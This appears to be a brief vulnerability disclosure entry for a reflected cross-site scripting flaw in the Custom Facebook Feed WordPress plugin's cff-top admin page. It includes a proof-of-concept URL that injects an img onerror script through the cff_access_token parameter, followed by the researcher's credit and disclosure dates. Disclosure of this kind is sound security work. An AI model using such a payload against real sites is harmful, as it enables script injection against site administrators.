The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3E&cff_final_response=true
Krzysztof Zając
Krzysztof Zając
Yes
2021-12-16 (about 1 years ago)
2021-12-16 (about 1 years ago)
2022-04-08 (about 9 months ago)